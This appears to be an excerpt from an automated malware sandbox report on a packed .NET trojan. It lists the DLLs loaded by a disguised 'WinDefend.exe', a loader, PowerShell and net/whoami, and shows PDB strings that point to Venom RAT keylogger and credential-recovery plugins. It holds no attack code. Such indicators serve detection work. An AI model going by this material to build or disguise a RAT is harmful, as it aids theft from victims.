Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source:	Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source:	Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
